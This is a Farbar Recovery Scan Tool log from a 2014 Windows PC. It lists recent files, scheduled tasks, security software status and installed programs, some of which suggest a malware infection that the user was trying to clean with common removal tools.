2014-08-08 09:29 - 2014-08-08 09:29 - 01171603 _____ () C:\Users\Stephen\Downloads\33a73e2c6cbb33d7839bbadf9e93bde9.swf
2014-07-31 20:05 - 2014-07-31 20:08 - 00000000 ____D () C:\Users\Stephen\Downloads\[RaianOnzika] Oneirology Experiment Part 1
2014-07-31 19:54 - 2014-07-31 19:56 - 11650569 _____ () C:\Users\Stephen\Downloads\[RaianOnzika] Oneirology Experiment Part 1.zip
2014-07-31 19:54 - 2014-07-31 19:55 - 36218284 _____ () C:\Users\Stephen\Downloads\[Otakon] The Punishment (Sonic The Hedgehog) [English] [Ongoing].zip
2014-07-31 19:51 - 2014-07-31 19:52 - 19861019 _____ () C:\Users\Stephen\Downloads\[Kadath] Misplaced Virtues (Part 2) (High-Rez).zip
2014-07-31 19:51 - 2014-07-31 19:52 - 14073193 _____ () C:\Users\Stephen\Downloads\[Kadath] Misplaced Virtues (Part 3) (Hi-Rez).zip
2014-07-31 19:51 - 2014-07-31 19:51 - 14315500 _____ () C:\Users\Stephen\Downloads\[Kadath] Misplaced Virtues (Prologue + Part 1) (High-Rez).zip
2014-07-31 19:44 - 2014-07-31 19:56 - 03573595 _____ () C:\Users\Stephen\Downloads\[Jay Naylor] Haukaiu The Hero - Chapter #2_ Haukaiu and the Elves.zip
2014-07-31 19:43 - 2014-07-31 19:43 - 14187735 _____ () C:\Users\Stephen\Downloads\(Nancini ) Nina Beginnings and Submissions.zip
2014-07-31 19:40 - 2014-07-31 19:49 - 15098650 _____ () C:\Users\Stephen\Downloads\[Kadath] Night Moves.zip
2014-07-31 19:39 - 2014-07-31 19:41 - 40260579 _____ () C:\Users\Stephen\Downloads\(drawingpalace) CHERNOBOG - The Ballerina.zip
2014-07-31 19:37 - 2014-08-11 21:08 - 28775065 _____ () C:\Users\Stephen\Downloads\[Palcomix] Reform School Whores!.zip
2014-07-31 19:37 - 2014-08-01 02:24 - 00000000 ____D () C:\Users\Stephen\Downloads\[Palcomix] Ninjas, Ninjas, Ninjas
2014-07-31 19:36 - 2014-07-31 19:36 - 00000000 ____D () C:\Users\Stephen\Downloads\Misato's New Girlfriend
2014-07-31 19:34 - 2014-07-31 19:43 - 47730117 _____ () C:\Users\Stephen\Downloads\(Palcomix) Girls Night Out and the Boy's Torment (Ongoing).zip
2014-07-31 19:24 - 2014-07-31 19:37 - 16651470 _____ () C:\Users\Stephen\Downloads\[Palcomix] Rouge's Toys 2 (Sonic The Hedgehog) [Ongoing].zip
2014-07-31 19:07 - 2014-07-31 19:07 - 00018654 _____ () C:\Users\Stephen\Downloads\Stephen Butler - Rogues of Rhea - Diagnosis w Comments.odt
2014-07-31 10:26 - 2014-07-31 10:26 - 00001546 _____ () C:\Users\Stephen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Notepad.lnk
2014-07-30 16:45 - 2014-07-30 16:46 - 19727637 _____ () C:\Users\Stephen\Downloads\Dr Sparky teaches tiny spinner ebony Lucky a lesson with his uv wand.flv
2014-07-30 15:29 - 2014-07-30 15:29 - 00050379 _____ () C:\Users\Stephen\Downloads\spanking_teasing_ebony_xlx.html
2014-07-30 09:50 - 2014-07-30 09:50 - 00001582 _____ () C:\Users\Stephen\Documents\Untitled 1.odt
2014-07-29 18:34 - 2014-07-29 18:34 - 00092536 _____ (System Applet ) C:\Users\Stephen\Downloads\Player-Chrome (3).exe
2014-07-29 18:34 - 2014-07-29 18:34 - 00092536 _____ (System Applet ) C:\Users\Stephen\Downloads\Player-Chrome (2).exe
2014-07-27 22:16 - 2014-07-27 22:17 - 00038967 _____ () C:\Users\Stephen\Downloads\download (1).jpe
2014-07-26 01:21 - 2014-07-26 01:21 - 03106923 _____ () C:\Users\Stephen\Downloads\1406174205207.webm
2014-07-25 18:19 - 2014-07-25 18:19 - 01839677 _____ () C:\Users\Stephen\Downloads\ERC(v0.2.6).zip
2014-07-25 16:55 - 2014-07-25 16:55 - 00000000 ____D () C:\Users\Stephen\Downloads\Crash Course Kit
2014-07-25 16:54 - 2014-07-25 16:54 - 00115885 _____ () C:\Users\Stephen\Downloads\Crash Course Kit.zip
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-23 13:41 - 2014-08-23 13:40 - 00025551 _____ () C:\Users\Stephen\Desktop\FRST.txt
2014-08-23 13:40 - 2014-08-23 13:39 - 00000000 ____D () C:\FRST
2014-08-23 13:40 - 2012-10-29 00:44 - 01532442 _____ () C:\windows\WindowsUpdate.log
2014-08-23 13:40 - 2012-07-26 03:59 - 00000000 ____D () C:\windows\CbsTemp
2014-08-23 13:39 - 2014-08-23 13:39 - 02103296 _____ (Farbar) C:\Users\Stephen\Downloads\FRST64.exe
2014-08-23 13:35 - 2012-10-29 01:31 - 00000000 ____D () C:\ProgramData\WinClon
2014-08-23 13:34 - 2013-01-06 17:55 - 00000000 ____D () C:\Users\Stephen\AppData\Local\CrashDumps
2014-08-23 13:34 - 2012-07-26 03:28 - 00848230 _____ () C:\windows\system32\PerfStringBackup.INI
2014-08-23 13:30 - 2012-12-27 19:35 - 00000918 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-08-23 13:27 - 2014-08-23 13:26 - 00290576 _____ () C:\windows\Minidump\082314-36093-01.dmp
2014-08-23 13:27 - 2013-06-16 21:07 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2014-08-23 13:27 - 2012-12-27 19:08 - 00000000 ____D () C:\Users\Stephen
2014-08-23 13:27 - 2012-07-26 03:22 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-08-23 13:26 - 2014-08-22 12:39 - 580607022 _____ () C:\windows\MEMORY.DMP
2014-08-23 13:26 - 2013-01-29 19:53 - 00000000 ____D () C:\windows\Minidump
2014-08-23 13:25 - 2014-08-23 13:25 - 00002560 _____ () C:\Users\Stephen\AppData\Local\A09170451A.exe
2014-08-23 13:25 - 2012-12-27 19:35 - 00000922 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-08-23 13:24 - 2014-08-23 13:24 - 02103296 _____ (Farbar) C:\Users\Stephen\Desktop\FRST64.exe
2014-08-23 13:24 - 2012-10-29 01:39 - 00000360 _____ () C:\windows\Tasks\Xerox PhotoCafe Communicator.job
2014-08-23 13:02 - 2012-07-26 04:12 - 00000000 ____D () C:\windows\system32\sru
2014-08-23 13:00 - 2014-08-21 11:48 - 00000840 _____ () C:\windows\Tasks\Security Center Update - 436866125.job
2014-08-23 13:00 - 2014-08-20 16:22 - 00000842 _____ () C:\windows\Tasks\Security Center Update - 406261607.job
2014-08-23 12:58 - 2014-08-23 12:58 - 00005244 _____ () C:\Users\Stephen\Desktop\attach.txt
2014-08-23 12:57 - 2014-08-23 12:58 - 00015909 _____ () C:\Users\Stephen\Desktop\dds.txt
2014-08-23 12:38 - 2014-08-23 12:38 - 00000000 ___SH () C:\DkHyperbootSync
2014-08-23 12:31 - 2014-08-23 12:29 - 00688992 ____R (Swearware) C:\Users\Stephen\Downloads\dds (1).com
2014-08-23 12:31 - 2014-08-23 12:29 - 00688992 _____ (Swearware) C:\Users\Stephen\Downloads\dds.com
2014-08-23 12:09 - 2012-12-27 20:50 - 00000000 ___RD () C:\Users\Stephen\Dropbox
2014-08-23 12:09 - 2012-12-27 20:46 - 00000000 ____D () C:\Users\Stephen\AppData\Roaming\Dropbox
2014-08-23 12:06 - 2012-07-26 01:37 - 00000000 ____D () C:\windows\servicing
2014-08-23 11:17 - 2014-08-23 11:17 - 00430728 _____ () C:\windows\system32\FNTCACHE.DAT
2014-08-23 11:13 - 2012-07-26 04:12 - 00000000 ___RD () C:\windows\ToastData
2014-08-23 11:13 - 2012-07-26 04:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2014-08-23 11:13 - 2012-07-26 04:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2014-08-23 11:13 - 2012-07-26 04:12 - 00000000 ____D () C:\windows\WinStore
2014-08-23 11:13 - 2012-07-26 04:12 - 00000000 ____D () C:\Program Files\Windows Photo Viewer
2014-08-23 11:13 - 2012-07-26 04:12 - 00000000 ____D () C:\Program Files (x86)\Windows Photo Viewer
2014-08-23 11:13 - 2012-07-26 01:38 - 00000000 ____D () C:\windows\SysWOW64\Dism
2014-08-23 11:13 - 2012-07-26 01:38 - 00000000 ____D () C:\windows\system32\oobe
2014-08-23 11:13 - 2012-07-26 01:38 - 00000000 ____D () C:\windows\system32\Dism
2014-08-23 11:12 - 2012-07-26 04:12 - 00000000 ___RD () C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2014-08-23 11:12 - 2012-07-26 04:12 - 00000000 ___RD () C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2014-08-23 11:12 - 2012-07-26 04:12 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2014-08-23 11:12 - 2012-07-26 04:12 - 00000000 ____D () C:\windows\system32\SecureBootUpdates
2014-08-23 11:12 - 2012-07-26 04:12 - 00000000 ____D () C:\windows\PolicyDefinitions
2014-08-23 11:12 - 2012-07-26 04:12 - 00000000 ____D () C:\Program Files\Windows Defender
2014-08-23 11:12 - 2012-07-26 04:12 - 00000000 ____D () C:\Program Files (x86)\Windows Defender
2014-08-23 11:12 - 2012-07-26 03:52 - 00000000 ____D () C:\Program Files\Windows Journal
2014-08-23 10:30 - 2012-07-26 01:26 - 00262144 ___SH () C:\windows\system32\config\BBI
2014-08-23 09:46 - 2013-03-01 00:02 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-08-23 09:11 - 2012-10-29 00:41 - 00000000 ____D () C:\ProgramData\Intel
2014-08-23 09:09 - 2012-10-29 01:45 - 00000000 ____D () C:\Users\EasySurvey
2014-08-23 09:08 - 2014-08-23 09:08 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel PROSet Wireless
2014-08-23 09:08 - 2014-08-23 09:08 - 00000000 ____D () C:\Program Files (x86)\Cisco
2014-08-23 09:08 - 2014-08-23 09:07 - 00000000 ____D () C:\ProgramData\Intel.sav
2014-08-23 09:08 - 2012-10-29 00:41 - 00000000 ____D () C:\Program Files\Common Files\Intel
2014-08-23 09:08 - 2012-10-29 00:41 - 00000000 ____D () C:\Program Files (x86)\Intel
2014-08-23 09:07 - 2012-10-29 00:41 - 00000000 ____D () C:\Program Files\Intel
2014-08-23 09:05 - 2013-06-23 13:46 - 00000000 ____D () C:\ProgramData\Package Cache
2014-08-23 09:00 - 2012-10-29 01:24 - 00000000 ____D () C:\Intel
2014-08-22 22:46 - 2012-07-26 01:26 - 00262144 ___SH () C:\windows\system32\config\ELAM
2014-08-22 14:40 - 2014-08-22 14:40 - 00007605 _____ () C:\Users\Stephen\AppData\Local\Resmon.ResmonCfg
2014-08-22 13:17 - 2012-12-27 19:09 - 00056688 _____ () C:\Users\Stephen\AppData\Roaming\AbsoluteReminder.xml
2014-08-22 12:40 - 2014-08-22 12:39 - 00286552 _____ () C:\windows\Minidump\082214-25421-01.dmp
2014-08-22 12:38 - 2014-08-22 12:38 - 00002560 _____ () C:\Users\Stephen\AppData\Local\53534DF0.exe
2014-08-22 09:01 - 2014-08-22 09:01 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-08-22 08:53 - 2014-08-22 08:53 - 02347384 _____ (ESET) C:\Users\Stephen\Desktop\esetsmartinstaller_enu.exe
2014-08-22 04:27 - 2014-08-22 04:00 - 00002146 _____ () C:\Users\Stephen\Desktop\Rkill.txt
2014-08-22 04:00 - 2014-08-22 04:00 - 01063160 _____ (Bleeping Computer, LLC) C:\Users\Stephen\Downloads\rkill64-2137.exe
2014-08-22 03:53 - 2014-08-22 03:51 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\Stephen\Downloads\rkill.exe
2014-08-22 02:59 - 2014-08-22 02:58 - 00000000 ____D () C:\Users\Stephen\Desktop\New folder (4)
2014-08-22 02:58 - 2014-08-22 02:58 - 00000000 ____D () C:\Users\Stephen\Documents\New folder (3)
2014-08-22 02:58 - 2014-08-22 02:58 - 00000000 ____D () C:\Users\Stephen\Documents\New folder (2)
2014-08-22 02:58 - 2014-08-22 02:58 - 00000000 ____D () C:\Users\Stephen\Documents\New folder
2014-08-22 01:35 - 2014-08-22 01:34 - 00910000 _____ () C:\Users\Stephen\Downloads\MicrosoftSystemScan_db9dee88-9091-4047-a2a0-bf19e4fd7a5d.exe
2014-08-21 19:00 - 2014-08-21 19:00 - 00002776 _____ () C:\windows\System32\Tasks\CCleanerSkipUAC
2014-08-21 19:00 - 2014-08-21 19:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-08-21 19:00 - 2014-08-21 18:59 - 00000000 ____D () C:\Program Files\CCleaner
2014-08-21 18:41 - 2014-08-21 18:40 - 04813544 _____ (Piriform Ltd) C:\Users\Stephen\Downloads\ccsetup416.exe
2014-08-21 17:32 - 2014-03-17 21:54 - 00000000 ____D () C:\Users\Stephen\AppData\Roaming\Skype
2014-08-21 17:28 - 2014-08-21 16:01 - 00000000 ____D () C:\Users\Stephen\AppData\Local\NPE
2014-08-21 17:23 - 2014-06-16 19:38 - 00000000 ____D () C:\Users\Stephen\AppData\Local\Web Technology
2014-08-21 16:10 - 2014-08-21 16:08 - 00000000 ____D () C:\NPE
2014-08-21 16:02 - 2012-10-29 01:37 - 00000000 ____D () C:\ProgramData\Norton
2014-08-21 16:01 - 2014-08-21 15:58 - 03077584 ____N (Symantec Corporation) C:\Users\Stephen\Downloads\npe.exe
2014-08-21 13:06 - 2014-08-21 13:06 - 00000000 _____ () C:\Users\Stephen\Downloads\FixNecurs64bit.log
2014-08-21 13:05 - 2014-08-21 13:04 - 05818744 _____ (Symantec Corporation) C:\Users\Stephen\Downloads\FixNecurs64bit.exe
2014-08-21 13:03 - 2014-08-21 13:03 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Stephen\Downloads\tdsskiller.exe
2014-08-21 13:02 - 2014-08-21 13:02 - 00277328 _____ (ESET) C:\Users\Stephen\Downloads\ESETZBotZRCleaner.exe
2014-08-21 12:40 - 2014-08-21 12:40 - 00000000 ____D () C:\Users\Stephen\Documents\Simply Super Software
2014-08-21 12:40 - 2014-08-21 12:40 - 00000000 ____D () C:\ProgramData\Licenses
2014-08-21 12:40 - 2012-10-29 01:28 - 00000000 ____D () C:\ProgramData\Temp
2014-08-21 12:38 - 2014-08-21 12:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Trojan Remover
2014-08-21 12:38 - 2014-08-21 12:36 - 00000000 ____D () C:\Program Files (x86)\Trojan Remover
2014-08-21 12:36 - 2014-08-21 12:36 - 00000000 ____D () C:\ProgramData\Simply Super Software
2014-08-21 12:33 - 2014-08-21 12:33 - 21657592 _____ (Simply Super Software ) C:\Users\Stephen\Downloads\trjsetup.exe
2014-08-21 11:48 - 2014-08-21 11:48 - 00003816 _____ () C:\windows\System32\Tasks\Security Center Update - 436866125
2014-08-21 11:46 - 2014-08-20 16:18 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-08-20 23:43 - 2012-08-05 17:07 - 00029090 _____ () C:\windows\PFRO.log
2014-08-20 23:08 - 2013-03-04 18:31 - 00111616 ___SH () C:\Users\Stephen\Documents\Thumbs.db
2014-08-20 22:59 - 2014-08-20 22:58 - 30517960 _____ (Microsoft Corporation) C:\Users\Stephen\Downloads\Windows-KB890830-x64-V5.15.exe
2014-08-20 22:18 - 2014-03-17 21:53 - 00000000 ____D () C:\ProgramData\Skype
2014-08-20 20:54 - 2013-08-02 23:46 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-08-20 20:54 - 2013-08-02 23:46 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-08-20 20:52 - 2014-04-14 14:00 - 00000000 ____D () C:\Users\Stephen\AppData\Roaming\uTorrent
2014-08-20 16:22 - 2014-08-20 16:22 - 00003818 _____ () C:\windows\System32\Tasks\Security Center Update - 406261607
2014-08-20 16:12 - 2014-08-20 16:12 - 00015817 _____ () C:\Users\Stephen\Downloads\122GRJ605.torrent
2014-08-20 00:52 - 2012-07-26 04:12 - 00000000 ____D () C:\windows\AUInstallAgent
2014-08-19 15:10 - 2013-08-02 23:47 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-08-18 12:36 - 2013-03-02 20:53 - 02884096 ___SH () C:\Users\Stephen\Desktop\Thumbs.db
2014-08-17 23:31 - 2014-08-17 23:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-17 23:31 - 2014-08-17 23:30 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-08-17 23:31 - 2014-08-17 23:30 - 00000000 ____D () C:\Program Files\iTunes
2014-08-17 23:31 - 2014-08-17 23:30 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-08-17 23:30 - 2014-08-17 23:30 - 00000000 ____D () C:\Program Files\iPod
2014-08-14 17:29 - 2012-07-26 04:12 - 00000000 ____D () C:\windows\system32\NDF
2014-08-14 15:47 - 2012-12-27 20:47 - 00000000 ____D () C:\Users\Stephen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2014-08-14 14:56 - 2014-08-14 14:56 - 00007488 _____ () C:\Users\Stephen\Downloads\English - Al Bhed Translator with Phonetics.htm
2014-08-14 11:57 - 2013-05-12 18:53 - 18726912 ___SH () C:\Users\Stephen\Downloads\Thumbs.db
2014-08-12 22:15 - 2013-01-08 20:28 - 00000000 ____D () C:\Users\Stephen\AppData\Roaming\vlc
2014-08-12 21:43 - 2014-08-12 21:43 - 22726310 _____ () C:\Users\Stephen\Downloads\ROBO BLAST.mp4
2014-08-12 00:35 - 2014-08-11 20:08 - 00000000 ____D () C:\Users\Stephen\Downloads\Super Mario Brothers [1993]-XviD -DVDRip-KaOsUSC (Kingdom-Release)
2014-08-11 21:08 - 2014-07-31 19:37 - 28775065 _____ () C:\Users\Stephen\Downloads\[Palcomix] Reform School Whores!.zip
2014-08-11 21:06 - 2014-08-11 20:09 - 00000000 ____D () C:\Users\Stephen\Downloads\Death.To.Smoochy.2002.720p.HDTV.x264.AC3-REKD
2014-08-11 20:34 - 2014-08-11 20:31 - 00000000 ____D () C:\Users\Stephen\Downloads\Hook (1991) [1080p]
2014-08-11 20:31 - 2014-08-11 20:31 - 00000000 ____D () C:\Users\Stephen\Downloads\Hook.1991.720p.BRRip.x264.AC3-REKD
2014-08-11 20:31 - 2014-07-21 13:30 - 00000000 ____D () C:\Users\Stephen\Downloads\SaHa
2014-08-11 19:58 - 2014-08-11 19:58 - 00019985 _____ () C:\Users\Stephen\Downloads\Super_Mario_Brothers_Movie_x-demonoid.ph-x_8656776.1006.torrent
2014-08-10 11:29 - 2014-08-10 11:23 - 37064000 _____ () C:\Users\Stephen\Downloads\rpgtoolkit321.zip
2014-08-08 09:29 - 2014-08-08 09:29 - 01171603 _____ () C:\Users\Stephen\Downloads\33a73e2c6cbb33d7839bbadf9e93bde9.swf
2014-08-01 02:24 - 2014-07-31 19:37 - 00000000 ____D () C:\Users\Stephen\Downloads\[Palcomix] Ninjas, Ninjas, Ninjas
2014-07-31 23:41 - 2012-12-29 14:15 - 99218768 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-07-31 20:08 - 2014-07-31 20:05 - 00000000 ____D () C:\Users\Stephen\Downloads\[RaianOnzika] Oneirology Experiment Part 1
2014-07-31 19:56 - 2014-07-31 19:54 - 11650569 _____ () C:\Users\Stephen\Downloads\[RaianOnzika] Oneirology Experiment Part 1.zip
2014-07-31 19:56 - 2014-07-31 19:44 - 03573595 _____ () C:\Users\Stephen\Downloads\[Jay Naylor] Haukaiu The Hero - Chapter #2_ Haukaiu and the Elves.zip
2014-07-31 19:55 - 2014-07-31 19:54 - 36218284 _____ () C:\Users\Stephen\Downloads\[Otakon] The Punishment (Sonic The Hedgehog) [English] [Ongoing].zip
2014-07-31 19:52 - 2014-07-31 19:51 - 19861019 _____ () C:\Users\Stephen\Downloads\[Kadath] Misplaced Virtues (Part 2) (High-Rez).zip
2014-07-31 19:52 - 2014-07-31 19:51 - 14073193 _____ () C:\Users\Stephen\Downloads\[Kadath] Misplaced Virtues (Part 3) (Hi-Rez).zip
2014-07-31 19:51 - 2014-07-31 19:51 - 14315500 _____ () C:\Users\Stephen\Downloads\[Kadath] Misplaced Virtues (Prologue + Part 1) (High-Rez).zip
2014-07-31 19:49 - 2014-07-31 19:40 - 15098650 _____ () C:\Users\Stephen\Downloads\[Kadath] Night Moves.zip
2014-07-31 19:43 - 2014-07-31 19:43 - 14187735 _____ () C:\Users\Stephen\Downloads\(Nancini ) Nina Beginnings and Submissions.zip
2014-07-31 19:43 - 2014-07-31 19:34 - 47730117 _____ () C:\Users\Stephen\Downloads\(Palcomix) Girls Night Out and the Boy's Torment (Ongoing).zip
2014-07-31 19:41 - 2014-07-31 19:39 - 40260579 _____ () C:\Users\Stephen\Downloads\(drawingpalace) CHERNOBOG - The Ballerina.zip
2014-07-31 19:37 - 2014-07-31 19:24 - 16651470 _____ () C:\Users\Stephen\Downloads\[Palcomix] Rouge's Toys 2 (Sonic The Hedgehog) [Ongoing].zip
2014-07-31 19:36 - 2014-07-31 19:36 - 00000000 ____D () C:\Users\Stephen\Downloads\Misato's New Girlfriend
2014-07-31 19:07 - 2014-07-31 19:07 - 00018654 _____ () C:\Users\Stephen\Downloads\Stephen Butler - Rogues of Rhea - Diagnosis w Comments.odt
2014-07-31 10:26 - 2014-07-31 10:26 - 00001546 _____ () C:\Users\Stephen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Notepad.lnk
2014-07-31 01:08 - 2013-01-08 20:28 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2014-07-30 16:46 - 2014-07-30 16:45 - 19727637 _____ () C:\Users\Stephen\Downloads\Dr Sparky teaches tiny spinner ebony Lucky a lesson with his uv wand.flv
2014-07-30 15:29 - 2014-07-30 15:29 - 00050379 _____ () C:\Users\Stephen\Downloads\spanking_teasing_ebony_xlx.html
2014-07-30 09:50 - 2014-07-30 09:50 - 00001582 _____ () C:\Users\Stephen\Documents\Untitled 1.odt
2014-07-29 18:34 - 2014-07-29 18:34 - 00092536 _____ (System Applet ) C:\Users\Stephen\Downloads\Player-Chrome (3).exe
2014-07-29 18:34 - 2014-07-29 18:34 - 00092536 _____ (System Applet ) C:\Users\Stephen\Downloads\Player-Chrome (2).exe
2014-07-27 22:17 - 2014-07-27 22:16 - 00038967 _____ () C:\Users\Stephen\Downloads\download (1).jpe
2014-07-26 01:21 - 2014-07-26 01:21 - 03106923 _____ () C:\Users\Stephen\Downloads\1406174205207.webm
2014-07-25 18:19 - 2014-07-25 18:19 - 01839677 _____ () C:\Users\Stephen\Downloads\ERC(v0.2.6).zip
2014-07-25 16:55 - 2014-07-25 16:55 - 00000000 ____D () C:\Users\Stephen\Downloads\Crash Course Kit
2014-07-25 16:54 - 2014-07-25 16:54 - 00115885 _____ () C:\Users\Stephen\Downloads\Crash Course Kit.zip
2014-07-25 16:51 - 2013-12-11 23:04 - 00000000 ____D () C:\Users\Stephen\AppData\Roaming\Stencyl
2014-07-25 16:50 - 2013-12-11 23:03 - 00000000 ____D () C:\Program Files (x86)\Stencyl
 
Files to move or delete:
====================
C:\ProgramData\MakeMarkerFile.exe
C:\Users\EasySurvey\EasySurvey.exe
 
 
Some content of TEMP:
====================
C:\Users\Stephen\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpzys3gw.dll
C:\Users\Stephen\AppData\Local\Temp\Scrivener-1710-update.exe
C:\Users\Stephen\AppData\Local\Temp\setup.exe
C:\Users\Stephen\AppData\Local\Temp\SPStub.exe
C:\Users\Stephen\AppData\Local\Temp\tbInte.dll
C:\Users\Stephen\AppData\Local\Temp\ToolbarHelper.exe
C:\Users\Stephen\AppData\Local\Temp\UpdateFlashPlayer_ba997d60.exe
C:\Users\Stephen\AppData\Local\Temp\UpdateFlashPlayer_c0bdc4bb.exe
C:\Users\Stephen\AppData\Local\Temp\vlc-2.1.5-win32.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-08-15 10:32
 
==================== End Of Log ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 23-08-2014
Ran by Stephen at 2014-08-23 13:42:38
Running from C:\Users\Stephen\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Norton Internet Security (Disabled - Out of date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
AS: Norton Internet Security (Disabled - Out of date) {631E4324-D31C-783F-EC5C-35AD42B18466}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton Internet Security (Disabled) {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
[PS3] Save Resigner (HKLM-x32\...\[PS3] Save Resigner 2.0.2) (Version: 2.0.2 - The Prince of Codes)
[PS3] Save Resigner (x32 Version: 2.0.2 - The Prince of Codes) Hidden
µTorrent (HKCU\...\uTorrent) (Version: 3.4.2.32239 - BitTorrent Inc.)
Absolute Reminder (HKLM-x32\...\{40F4FF7A-B214-4453-B973-080B09CED019}) (Version: 2.1.0.8 - Absolute Software)
Action Replay Code Manager (HKLM-x32\...\Action Replay Code Manager_is1) (Version:  - )
ActiveState Komodo Edit 8.0.2 (HKLM-x32\...\{547E41FE-DFF8-42A2-BA26-D74FC3C4D4C0}) (Version: 8.0.2 - ActiveState Software Inc.)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.9.0.1030 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 3.9.0.1030 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 14 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 14.0.0.145 - Adobe Systems Incorporated)
Adobe Reader X (10.1.11) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}) (Version: 10.1.11 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{6AF2AC2A-3532-43FD-9F4D-BDC9C0D724C7}) (Version: 7.1.2.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArtRage 4 (HKLM-x32\...\ArtRage 4 4.0.2.1) (Version: 4.0.2.1 - Ambient Design)
ArtRage 4 (x32 Version: 4.0.2.1 - Ambient Design) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 4.16 - Piriform)
CDisplay 1.8 (HKLM-x32\...\CDisplay_is1) (Version:  - dvd8n)
Classic Shell (HKLM\...\{CB00799C-0E4F-4FD1-A046-BD24321BCDFF}) (Version: 3.6.5 - IvoSoft)
Core FTP LE (HKLM-x32\...\CoreFTP) (Version:  - )
CyberLink PowerDVD 10 (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.4421.02 - CyberLink Corp.)
CyberLink PowerDVD 10 (x32 Version: 10.0.4421.02 - CyberLink Corp.) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM-x32\...\{90140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUS_{132D27B8-C656-44BD-8C16-73C54EA8A85F}) (Version:  - Microsoft)
Dropbox (HKCU\...\Dropbox) (Version: 2.10.27 - Dropbox, Inc.)
Easy File Share (HKLM-x32\...\{A7C37D4B-F37A-42E8-9B6A-B28C18AD4C12}) (Version: 1.3.4 - Samsung Electronics CO.,LTD.)
E-POP (HKLM-x32\...\{F06DD8D9-9DC8-430C-835C-C9BF21E05CC1}) (Version: 1.0.1 - Samsung Electronics CO., LTD.)
ESET Online Scanner v3 (HKLM-x32\...\ESET Online Scanner) (Version:  - )
ETDWare PS/2-X64 11.7.2.1_WHQL (HKLM\...\Elantech) (Version: 11.7.2.1 - ELAN Microelectronic Corp.)
